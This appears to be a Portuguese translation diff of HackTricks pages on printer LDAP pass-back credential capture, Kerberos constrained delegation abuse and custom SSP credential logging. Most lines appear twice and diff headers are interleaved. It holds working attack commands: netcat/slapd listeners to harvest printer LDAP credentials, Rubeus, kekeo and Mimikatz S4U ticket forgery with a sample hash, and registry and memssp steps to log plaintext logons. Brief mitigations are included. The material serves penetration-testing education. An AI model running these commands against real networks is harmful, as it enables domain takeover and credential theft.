Além disso, várias impressoras conterão **logs com nomes de usuários** ou até mesmo poderão **baixar todos os nomes de usuários** do Controlador de Domínio.
Todas essas **informações sensíveis** e a comum **falta de segurança** tornam as impressoras muito interessantes para atacantes.
Alguns blogs sobre o tópico:
* [https://www.ceos3c.com/hacking/obtaining-domain-credentials-printer-netcat/](https://www.ceos3c.com/hacking/obtaining-domain-credentials-printer-netcat/)
* [https://medium.com/@nickvangilder/exploiting-multifunction-printers-during-a-penetration-test-engagement-28d3840d8856](https://medium.com/@nickvangilder/exploiting-multifunction-printers-during-a-penetration-test-engagement-28d3840d8856)
**As seguintes informações foram copiadas de** [**https://grimhacker.com/2018/03/09/just-a-printer/**](https://grimhacker.com/2018/03/09/just-a-printer/)
# Configurações do LDAP
# Configurações LDAP
Nas impressoras Konica Minolta, é possível configurar um servidor LDAP para se conectar, juntamente com as credenciais. Em versões anteriores do firmware desses dispositivos, ouvi dizer que é possível recuperar as credenciais simplesmente lendo a fonte html da página. Agora, no entanto, as credenciais não são retornadas na interface, então temos que trabalhar um pouco mais.
Nas impressoras Konica Minolta é possível configurar um servidor LDAP para se conectar, juntamente com as credenciais. Em versões anteriores do firmware desses dispositivos, ouvi dizer que é possível recuperar as credenciais simplesmente lendo o código-fonte HTML da página. Agora, no entanto, as credenciais não são mais retornadas na interface, então temos que trabalhar um pouco mais.
A lista de servidores LDAP está em: Rede > Configuração LDAP > Configurando o LDAP
A lista de Servidores LDAP está em: Rede > Configuração LDAP > Configurando LDAP
A interface permite que o servidor LDAP seja modificado sem reentrar as credenciais que serão usadas para se conectar. Presumo que isso seja para uma experiência de usuário mais simples, mas dá uma oportunidade para um invasor escalar de mestre de uma impressora para um ponto de apoio no domínio.
A interface permite que o servidor LDAP seja modificado sem reentrar as credenciais que serão usadas para conectar. Presumo que isso seja para uma experiência de usuário mais simples, mas oferece uma oportunidade para um atacante escalar de mestre de uma impressora para um ponto de apoio no domínio.
Podemos reconfigurar a configuração do endereço do servidor LDAP para uma máquina que controlamos e acionar uma conexão com a útil funcionalidade "Testar Conexão".
Podemos reconfigurar o endereço do servidor LDAP para uma máquina que controlamos e acionar uma conexão com a funcionalidade útil "Testar Conexão".
# Ouvindo as informações
# Aguardando pelos bens
## netcat
Se você tiver mais sorte do que eu, poderá se safar com um simples ouvinte netcat:
Se você tiver mais sorte do que eu, talvez consiga se safar com um simples ouvinte netcat:
```
sudo nc -k -v -l -p 386
```
Sou assegurado por [@\_castleinthesky](https://twitter.com/\_castleinthesky) que isso funciona na maioria das vezes, no entanto, ainda não tive tanta sorte.
Tenho a garantia de [@\_castleinthesky](https://twitter.com/\_castleinthesky) de que isso funciona na maioria das vezes, no entanto, ainda não tive essa facilidade.
## Slapd
Descobri que um servidor LDAP completo é necessário, pois a impressora primeiro tenta uma ligação nula e, em seguida, consulta as informações disponíveis, somente se essas operações forem bem-sucedidas, ela prossegue para se ligar com as credenciais.
Descobri que um servidor LDAP completo é necessário, pois a impressora primeiro tenta uma ligação nula e depois consulta as informações disponíveis, só prosseguindo para se ligar com as credenciais se essas operações forem bem-sucedidas.
Procurei por um servidor LDAP simples que atendesse aos requisitos, no entanto, parecia haver opções limitadas. No final, optei por configurar um servidor LDAP aberto e usar o serviço de servidor de depuração slapd para aceitar conexões e imprimir as mensagens da impressora. (Se você conhece uma alternativa mais fácil, ficaria feliz em ouvir sobre ela)
Procurei por um servidor ldap simples que atendesse aos requisitos, mas parecia haver opções limitadas. No final, optei por configurar um servidor ldap aberto e usar o serviço de servidor de depuração slapd para aceitar conexões e imprimir as mensagens da impressora. (Se você conhecer uma alternativa mais fácil, ficaria feliz em saber)
### Instalação
(Obs: esta seção é uma versão levemente adaptada do guia aqui [https://www.server-world.info/en/note?os=Fedora\_26\&p=openldap](https://www.server-world.info/en/note?os=Fedora\_26\&p=openldap) )
(Nota: esta seção é uma versão ligeiramente adaptada do guia aqui [https://www.server-world.info/en/note?os=Fedora\_26\&p=openldap](https://www.server-world.info/en/note?os=Fedora\_26\&p=openldap) )
De um terminal de root:
A partir de um terminal root:
**Instale o OpenLDAP,**
```
#> dnf install -y install openldap-servers openldap-clients
#> cp /usr/share/openldap-servers/DB_CONFIG.example /var/lib/ldap/DB_CONFIG
#> cp /usr/share/openldap-servers/DB_CONFIG.example /var/lib/ldap/DB_CONFIG
#> chown ldap. /var/lib/ldap/DB_CONFIG
```
**Definir uma senha de administrador do OpenLDAP (você precisará dela novamente em breve)**
**Defina uma senha de administrador OpenLDAP (você precisará dela em breve)**
```
#> slappasswd
#> slappasswd
New password:
Re-enter new password:
{SSHA}xxxxxxxxxxxxxxxxxxxxxxxx
@ -77,19 +93,19 @@ modifying entry "olcDatabase={0}config,cn=config"
```
**Importar Esquemas Básicos**
```
#> ldapadd -Y EXTERNAL -H ldapi:/// -f /etc/openldap/schema/cosine.ldif
#> ldapadd -Y EXTERNAL -H ldapi:/// -f /etc/openldap/schema/cosine.ldif
SASL/EXTERNAL authentication started
SASL username: gidNumber=0+uidNumber=0,cn=peercred,cn=external,cn=auth
SASL SSF: 0
adding new entry "cn=cosine,cn=schema,cn=config"
#> ldapadd -Y EXTERNAL -H ldapi:/// -f /etc/openldap/schema/nis.ldif
#> ldapadd -Y EXTERNAL -H ldapi:/// -f /etc/openldap/schema/nis.ldif
SASL/EXTERNAL authentication started
SASL username: gidNumber=0+uidNumber=0,cn=peercred,cn=external,cn=auth
SASL SSF: 0
adding new entry "cn=nis,cn=schema,cn=config"
#> ldapadd -Y EXTERNAL -H ldapi:/// -f /etc/openldap/schema/inetorgperson.ldif
#> ldapadd -Y EXTERNAL -H ldapi:/// -f /etc/openldap/schema/inetorgperson.ldif
SASL/EXTERNAL authentication started
SASL username: gidNumber=0+uidNumber=0,cn=peercred,cn=external,cn=auth
SASL SSF: 0
@ -98,7 +114,7 @@ adding new entry "cn=inetorgperson,cn=schema,cn=config"
**Defina o nome do seu domínio no banco de dados LDAP.**
```
# generate directory manager's password
#> slappasswd
#> slappasswd
New password:
Re-enter new password:
{SSHA}xxxxxxxxxxxxxxxxxxxxxxxx
@ -134,7 +150,7 @@ dn="cn=Manager,dc=foo,dc=bar" write by anonymous auth by self write by * none
olcAccess: {1}to dn.base="" by * read
olcAccess: {2}to * by dn="cn=Manager,dc=foo,dc=bar" write by * read
#> ldapmodify -Y EXTERNAL -H ldapi:/// -f chdomain.ldif
#> ldapmodify -Y EXTERNAL -H ldapi:/// -f chdomain.ldif
SASL/EXTERNAL authentication started
SASL username: gidNumber=0+uidNumber=0,cn=peercred,cn=external,cn=auth
SASL SSF: 0
@ -169,7 +185,7 @@ dn: ou=Group,dc=foo,dc=bar
objectClass: organizationalUnit
ou: Group
#> ldapadd -x -D cn=Manager,dc=foo,dc=bar -W -f basedomain.ldif
#> ldapadd -x -D cn=Manager,dc=foo,dc=bar -W -f basedomain.ldif
Enter LDAP Password: # directory manager's password
adding new entry "dc=foo,dc=bar"
@ -179,12 +195,12 @@ adding new entry "ou=People,dc=foo,dc=bar"
adding new entry "ou=Group,dc=foo,dc=bar"
```
**Configurar o LDAP TLS**
**Configurar LDAP TLS**
**Criar um Certificado SSL**
```
#> cd /etc/pki/tls/certs
#> make server.key
#> cd /etc/pki/tls/certs
#> make server.key
umask 77 ; \
/usr/bin/openssl genrsa -aes128 2048 > server.key
Generating RSA private key, 2048 bit long modulus
@ -195,11 +211,11 @@ Enter pass phrase: # set passphrase
Verifying - Enter pass phrase: # confirm
# remove passphrase from private key
#> openssl rsa -in server.key -out server.key
#> openssl rsa -in server.key -out server.key
Enter pass phrase for server.key: # input passphrase
writing RSA key
#> make server.csr
#> make server.csr
umask 77 ; \
/usr/bin/openssl req -utf8 -new -key server.key -out server.csr
You are about to be asked to enter information that will be incorporated
@ -226,15 +242,7 @@ Signature ok
subject=/C=/ST=/L=/O=/OU=Foo Bar/CN=dlp.foo.bar/emailAddress=xxx@roo.bar
Getting Private key
```
**Configurar o Slapd para SSL/TLS**
Para garantir a segurança das informações transmitidas entre o cliente e o servidor LDAP, é recomendado configurar o Slapd para usar SSL/TLS. Isso pode ser feito seguindo os seguintes passos:
1. Gerar um certificado SSL/TLS válido para o servidor LDAP.
2. Configurar o Slapd para usar o certificado SSL/TLS.
3. Configurar o cliente LDAP para se conectar ao servidor usando SSL/TLS.
Ao configurar o Slapd para usar SSL/TLS, é importante garantir que o certificado SSL/TLS seja válido e que o cliente LDAP esteja configurado corretamente para se conectar ao servidor usando SSL/TLS.
**Configurar Slapd para SSL/TLS**
```
#> cp /etc/pki/tls/certs/server.key \
/etc/pki/tls/certs/server.crt \
@ -247,7 +255,7 @@ Ao configurar o Slapd para usar SSL/TLS, é importante garantir que o certificad
#> vim mod_ssl.ldif
# create new
dn: cn=config
dn: cn=config
changetype: modify
add: olcTLSCACertificateFile
olcTLSCACertificateFile: /etc/openldap/certs/ca-bundle.crt
@ -258,27 +266,25 @@ olcTLSCertificateFile: /etc/openldap/certs/server.crt
replace: olcTLSCertificateKeyFile
olcTLSCertificateKeyFile: /etc/openldap/certs/server.key
#> ldapmodify -Y EXTERNAL -H ldapi:/// -f mod_ssl.ldif
#> ldapmodify -Y EXTERNAL -H ldapi:/// -f mod_ssl.ldif
SASL/EXTERNAL authentication started
SASL username: gidNumber=0+uidNumber=0,cn=peercred,cn=external,cn=auth
SASL SSF: 0
modifying entry "cn=config"
```
**Permita o LDAP através do firewall local**
Para obter informações do Active Directory, é necessário permitir o tráfego LDAP através do firewall local. Isso pode ser feito abrindo a porta 389 para tráfego não seguro ou a porta 636 para tráfego seguro (usando SSL). Certifique-se de que apenas as máquinas necessárias tenham acesso a essas portas para evitar possíveis vazamentos de informações.
**Permita LDAP através do seu firewall local**
```
firewall-cmd --add-service={ldap,ldaps}
```
## O pagamento
## A recompensa
Depois de instalar e configurar o serviço LDAP, você pode executá-lo com o seguinte comando:
Uma vez que tenha instalado e configurado o seu serviço LDAP, pode executá-lo com o seguinte comando:
> ```
> slapd -d 2
> ```
A captura de tela abaixo mostra um exemplo da saída quando executamos o teste de conexão na impressora. Como você pode ver, o nome de usuário e a senha são passados do cliente LDAP para o servidor.
A captura de tela abaixo mostra um exemplo da saída quando executamos o teste de conexão na impressora. Como pode ver, o nome de usuário e a senha são transmitidos do cliente LDAP para o servidor.
![saída do terminal slapd contendo o nome de usuário "MyUser" e a senha "MyPassword"](https://i1.wp.com/grimhacker.com/wp-content/uploads/2018/03/slapd\_output.png?resize=474%2C163\&ssl=1)
@ -286,25 +292,23 @@ A captura de tela abaixo mostra um exemplo da saída quando executamos o teste d
Isso depende muito das credenciais que foram configuradas.
Se o princípio do menor privilégio estiver sendo seguido, você poderá obter apenas acesso de leitura a determinados elementos do Active Directory. Isso ainda é frequentemente valioso, pois você pode usar essas informações para formular ataques mais precisos.
Se o princípio do menor privilégio estiver sendo seguido, então você pode apenas obter acesso de leitura a certos elementos do Active Directory. Isso muitas vezes ainda é valioso, pois você pode usar essa informação para formular ataques mais precisos e eficazes.
Normalmente, você provavelmente obterá uma conta no grupo Domain Users, o que pode dar acesso a informações confidenciais ou formar a autenticação pré-requisito para outros ataques.
Tipicamente, é provável que você consiga uma conta no grupo Domain Users, o que pode dar acesso a informações sensíveis ou formar a autenticação pré-requisito para outros ataques.
Ou, como eu, você pode ser recompensado por configurar um servidor LDAP e receber uma conta de administrador de domínio em uma bandeja de prata.
Ou, como eu, você pode ser recompensado por configurar um servidor LDAP e receber uma conta de Domain Admin em bandeja de prata.
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
<summary><strong>Aprenda hacking no AWS do zero ao herói com</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
- Você trabalha em uma **empresa de segurança cibernética**? Você quer ver sua **empresa anunciada no HackTricks**? ou quer ter acesso à **última versão do PEASS ou baixar o HackTricks em PDF**? Confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
Outras formas de apoiar o HackTricks:
- Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
- Adquira o [**swag oficial do PEASS & HackTricks**](https://peass.creator-spring.com)
- **Junte-se ao** [**💬**](https://emojipedia.org/speech-balloon/) [**grupo Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo telegram**](https://t.me/peass) ou **siga-me** no **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
- **Compartilhe suas técnicas de hacking enviando PRs para o [repositório hacktricks](https://github.com/carlospolop/hacktricks) e [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
* Se quiser ver a sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF**, confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Adquira o [**merchandising oficial do PEASS & HackTricks**](https://peass.creator-spring.com)
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção de [**NFTs**](https://opensea.io/collection/the-peass-family) exclusivos
* **Junte-se ao grupo** 💬 [**Discord**](https://discord.gg/hRep4RUj7f) ou ao grupo [**telegram**](https://t.me/peass) ou **siga-me** no **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **Compartilhe suas técnicas de hacking enviando PRs para os repositórios do github** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud).
</details>

72
windows-hardening/active-directory-methodology/constrained-delegation.md
View file

@ -1,17 +1,33 @@
# Delegação Restrita
<details>
<summary><strong>Aprenda hacking no AWS do zero ao herói com</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Outras formas de apoiar o HackTricks:
* Se você quer ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF**, confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Adquira o [**material oficial PEASS & HackTricks**](https://peass.creator-spring.com)
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção de [**NFTs**](https://opensea.io/collection/the-peass-family) exclusivos
* **Junte-se ao grupo** 💬 [**Discord**](https://discord.gg/hRep4RUj7f) ou ao grupo [**telegram**](https://t.me/peass) ou **siga**-me no **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **Compartilhe suas técnicas de hacking enviando PRs para os repositórios do** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) no github.
</details>
## Delegação Restrita
Usando isso, um administrador de domínio pode permitir que um computador se faça passar por um usuário ou computador em relação a um serviço de uma máquina.
Usando isso, um administrador de domínio pode **permitir** que um computador **se passe por um usuário ou computador** contra um **serviço** de uma máquina.
* **Serviço para o usuário se autoconceder (**_**S4U2self**_**):** Se uma conta de serviço tiver um valor _userAccountControl_ contendo [TRUSTED\_TO\_AUTH\_FOR\_DELEGATION](https://msdn.microsoft.com/en-us/library/aa772300\(v=vs.85\).aspx) (T2A4D), ela pode obter um TGS para si mesma (o serviço) em nome de qualquer outro usuário.
* **Serviço para o usuário se autenticar por proxy (**_**S4U2proxy**_**):** Uma conta de serviço pode obter um TGS em nome de qualquer usuário para o serviço definido em **msDS-AllowedToDelegateTo**. Para fazer isso, primeiro é necessário um TGS desse usuário para si mesmo, mas pode-se usar o S4U2self para obter esse TGS antes de solicitar o outro.
* **Serviço para Usuário próprio (**_**S4U2self**_**):** Se uma **conta de serviço** tem um valor _userAccountControl_ contendo [TRUSTED\_TO\_AUTH\_FOR\_DELEGATION](https://msdn.microsoft.com/en-us/library/aa772300\(v=vs.85\).aspx) (T2A4D), então ela pode obter um TGS para si mesma (o serviço) em nome de qualquer outro usuário.
* **Serviço para Usuário para Proxy(**_**S4U2proxy**_**):** Uma **conta de serviço** pode obter um TGS em nome de qualquer usuário para o serviço definido em **msDS-AllowedToDelegateTo.** Para fazer isso, primeiro precisa de um TGS desse usuário para si mesma, mas pode usar S4U2self para obter esse TGS antes de solicitar o outro.
**Nota**: Se um usuário for marcado como '_Account is sensitive and cannot be delegated_ ' no AD, você **não poderá se passar por ele**.
**Nota**: Se um usuário está marcado como '_Conta é sensível e não pode ser delegada_' no AD, você **não poderá se passar** por eles.
Isso significa que, se você **comprometer o hash do serviço**, poderá **se passar por usuários** e obter **acesso** em nome deles ao **serviço configurado** (possível **privesc**).
Isso significa que, se você **comprometer o hash do serviço**, pode **se passar por usuários** e obter **acesso** em nome deles ao **serviço configurado** (possível **privesc**).
Além disso, você **não terá apenas acesso ao serviço que o usuário pode se passar, mas também a qualquer serviço**, porque o SPN (o nome do serviço solicitado) não está sendo verificado, apenas os privilégios. Portanto, se você tiver acesso ao **serviço CIFS**, também poderá ter acesso ao **serviço HOST** usando a flag `/altservice` no Rubeus.
Além disso, você **não terá acesso apenas ao serviço que o usuário pode se passar, mas também a qualquer serviço**, porque o SPN (o nome do serviço solicitado) não está sendo verificado, apenas os privilégios. Portanto, se você tem acesso ao serviço **CIFS**, também pode ter acesso ao serviço **HOST** usando a flag `/altservice` no Rubeus.
Além disso, o acesso ao **serviço LDAP em DC** é o que é necessário para explorar um **DCSync**.
Também, o **acesso ao serviço LDAP no DC** é o que é necessário para explorar um **DCSync**.
{% code title="Enumerar" %}
```bash
@ -22,6 +38,8 @@ Get-DomainComputer -TrustedToAuth | select userprincipalname, name, msds-allowed
#ADSearch
ADSearch.exe --search "(&(objectCategory=computer)(msds-allowedtodelegateto=*))" --attributes cn,dnshostname,samaccountname,msds-allowedtodelegateto --json
```
{% endcode %}
{% code title="Obter TGT" %}
```bash
# The first step is to get a TGT of the service that can impersonate others
@ -44,12 +62,12 @@ tgt::ask /user:dcorp-adminsrv$ /domain:dollarcorp.moneycorp.local /rc4:8c6264140
{% endcode %}
{% hint style="warning" %}
Existem **outras maneiras de obter um ticket TGT** ou o **RC4** ou **AES256** sem ser SYSTEM no computador, como o Printer Bug e a delegação não restrita, o relé NTLM e o abuso do Active Directory Certificate Service.
Existem **outras maneiras de obter um ticket TGT** ou as chaves **RC4** ou **AES256** sem ser SYSTEM no computador, como o Printer Bug, delegação sem restrições, retransmissão NTLM e abuso do Serviço de Certificados do Active Directory.
**Apenas tendo esse ticket TGT (ou hash), você pode realizar esse ataque sem comprometer todo o computador.**
**Apenas possuindo esse ticket TGT (ou seu hash), você pode realizar esse ataque sem comprometer o computador inteiro.**
{% endhint %}
{% code title="Usando o Rubeus" %}
{% code title="Usando Rubeus" %}
```bash
#Obtain a TGS of the Administrator user to self
.\Rubeus.exe s4u /ticket:TGT_websvc.kirbi /impersonateuser:Administrator /outfile:TGS_administrator
@ -66,17 +84,11 @@ Existem **outras maneiras de obter um ticket TGT** ou o **RC4** ou **AES256** se
#Load ticket in memory
.\Rubeus.exe ptt /ticket:TGS_administrator_CIFS_HOST-dcorp-mssql.dollarcorp.moneycorp.local
```
```markdown
{% endcode %}
{% code title="kekeo + Mimikatz" %}
O kekeo é uma ferramenta que permite a criação de tickets Kerberos para realizar a delegação restrita. O Mimikatz é usado para extrair as credenciais necessárias para criar os tickets. O processo é o seguinte:
1. Extraia as credenciais do usuário que tem permissão para delegação restrita usando o Mimikatz.
2. Use o kekeo para criar um ticket Kerberos para o serviço alvo.
3. Use o ticket para acessar o serviço alvo.
Este método é útil quando o serviço alvo não está acessível diretamente, mas pode ser acessado por meio de outro serviço que tenha permissão de delegação restrita.
```
```bash
#Obtain a TGT for the Constained allowed user
tgt::ask /user:dcorp-adminsrv$ /domain:dollarcorp.moneycorp.local /rc4:8c6264140d5ae7d03f7f2a53088a291d
@ -85,30 +97,28 @@ tgt::ask /user:dcorp-adminsrv$ /domain:dollarcorp.moneycorp.local /rc4:8c6264140
tgs::s4u /tgt:TGT_dcorpadminsrv$@DOLLARCORP.MONEYCORP.LOCAL_krbtgt~dollarcorp.moneycorp.local@DOLLAR CORP.MONEYCORP.LOCAL.kirbi /user:Administrator@dollarcorp.moneycorp.local /service:time/dcorp-dc.dollarcorp.moneycorp.LOCAL|ldap/dcorpdc.dollarcorp.moneycorp.LOCAL
#Load the TGS in memory
Invoke-Mimikatz -Command '"kerberos::ptt TGS_Administrator@dollarcorp.moneycorp.local@DOLLARCORP.MONEYCORP.LOCAL_ldap~ dcorp-dc.dollarcorp.moneycorp.LOCAL@DOLLARCORP.MONEYCORP.LOCAL_ALT.kirbi"'
Invoke-Mimikatz -Command '"kerberos::ptt TGS_Administrator@dollarcorp.moneycorp.local@DOLLARCORP.MONEYCORP.LOCAL_ldap~ dcorp-dc.dollarcorp.moneycorp.LOCAL@DOLLARCORP.MONEYCORP.LOCAL_ALT.kirbi"'
```
{% endcode %}
### Mitigação
* Desativar a delegação Kerberos sempre que possível
* Limitar logins de DA/Admin para serviços específicos
* Definir "A conta é sensível e não pode ser delegada" para contas privilegiadas.
* Desative a delegação do kerberos quando possível
* Limite logins de DA/Admin a serviços específicos
* Defina "Conta é sensível e não pode ser delegada" para contas privilegiadas.
[**Mais informações em ired.team.**](https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/abusing-kerberos-constrained-delegation)
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
<summary><strong>Aprenda hacking no AWS do zero ao herói com</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
- Você trabalha em uma **empresa de segurança cibernética**? Quer ver sua **empresa anunciada no HackTricks**? ou quer ter acesso à **última versão do PEASS ou baixar o HackTricks em PDF**? Confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
Outras formas de apoiar o HackTricks:
- Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
- Adquira o [**swag oficial do PEASS & HackTricks**](https://peass.creator-spring.com)
- **Junte-se ao** [**💬**](https://emojipedia.org/speech-balloon/) [**grupo do Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo do telegram**](https://t.me/peass) ou **siga-me** no **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
- **Compartilhe suas técnicas de hacking enviando PRs para o [repositório hacktricks](https://github.com/carlospolop/hacktricks) e [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
* Se você quer ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF**, confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Adquira o [**material oficial PEASS & HackTricks**](https://peass.creator-spring.com)
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção de [**NFTs**](https://opensea.io/collection/the-peass-family) exclusivos
* **Junte-se ao grupo** 💬 [**Discord**](https://discord.gg/hRep4RUj7f) ou ao grupo [**telegram**](https://t.me/peass) ou **siga**-me no **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **Compartilhe suas técnicas de hacking enviando PRs para os repositórios github do** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud).
</details>

53
windows-hardening/active-directory-methodology/custom-ssp.md
View file

@ -1,72 +1,65 @@
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
<summary><strong>Aprenda hacking no AWS do zero ao herói com</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
- Você trabalha em uma **empresa de segurança cibernética**? Você quer ver sua **empresa anunciada no HackTricks**? ou você quer ter acesso à **última versão do PEASS ou baixar o HackTricks em PDF**? Confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
Outras formas de apoiar o HackTricks:
- Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
- Adquira o [**swag oficial do PEASS & HackTricks**](https://peass.creator-spring.com)
- **Junte-se ao** [**💬**](https://emojipedia.org/speech-balloon/) [**grupo do Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo do telegram**](https://t.me/peass) ou **siga-me** no **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
- **Compartilhe suas técnicas de hacking enviando PRs para o [repositório hacktricks](https://github.com/carlospolop/hacktricks) e [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
* Se você quer ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF**, confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Adquira o [**material oficial PEASS & HackTricks**](https://peass.creator-spring.com)
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção de [**NFTs**](https://opensea.io/collection/the-peass-family) exclusivos
* **Junte-se ao grupo** 💬 [**Discord**](https://discord.gg/hRep4RUj7f) ou ao grupo [**telegram**](https://t.me/peass) ou **siga-me** no **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **Compartilhe suas técnicas de hacking enviando PRs para os repositórios github do** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud).
</details>
# SSP Personalizado
[Veja o que é um SSP (Security Support Provider) aqui.](../authentication-credentials-uac-and-efs.md#security-support-provider-interface-sspi)\
[Aprenda o que é um SSP (Provedor de Suporte de Segurança) aqui.](../authentication-credentials-uac-and-efs.md#security-support-provider-interface-sspi)\
Você pode criar seu **próprio SSP** para **capturar** em **texto claro** as **credenciais** usadas para acessar a máquina.
### Mimilib
Você pode usar o binário `mimilib.dll` fornecido pelo Mimikatz. **Isso registrará em um arquivo todas as credenciais em texto claro.**\
Coloque o dll em `C:\Windows\System32\`\
Obtenha uma lista de pacotes de segurança LSA existentes:
Coloque a dll em `C:\Windows\System32\`\
Obtenha uma lista dos Pacotes de Segurança LSA existentes:
{% code title="atacante@alvo" %}
{% code title="attacker@target" %}
```bash
PS C:\> reg query hklm\system\currentcontrolset\control\lsa\ /v "Security Packages"
HKEY_LOCAL_MACHINE\system\currentcontrolset\control\lsa
Security Packages REG_MULTI_SZ kerberos\0msv1_0\0schannel\0wdigest\0tspkg\0pku2u
Security Packages REG_MULTI_SZ kerberos\0msv1_0\0schannel\0wdigest\0tspkg\0pku2u
```
{% endcode %}
Adicione `mimilib.dll` à lista de provedores de suporte de segurança (Security Packages):
Adicione `mimilib.dll` à lista de Provedor de Suporte de Segurança (Pacotes de Segurança):
```csharp
PS C:\> reg add "hklm\system\currentcontrolset\control\lsa\" /v "Security Packages"
```
E após uma reinicialização, todas as credenciais podem ser encontradas em texto claro em `C:\Windows\System32\kiwissp.log`
E após um reinício, todas as credenciais podem ser encontradas em texto claro em `C:\Windows\System32\kiwissp.log`
### Na memória
Você também pode injetar isso diretamente na memória usando o Mimikatz (observe que pode ser um pouco instável/não funcionar):
Você também pode injetar isso diretamente na memória usando Mimikatz (note que isso pode ser um pouco instável/não funcionar):
```csharp
privilege::debug
misc::memssp
```
Isso não sobreviverá a reinicializações.
## Mitigação
ID do evento 4657 - Auditoria da criação/mudança de `HKLM:\System\CurrentControlSet\Control\Lsa\SecurityPackages`
ID do Evento 4657 - Auditoria da criação/alteração de `HKLM:\System\CurrentControlSet\Control\Lsa\SecurityPackages`
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
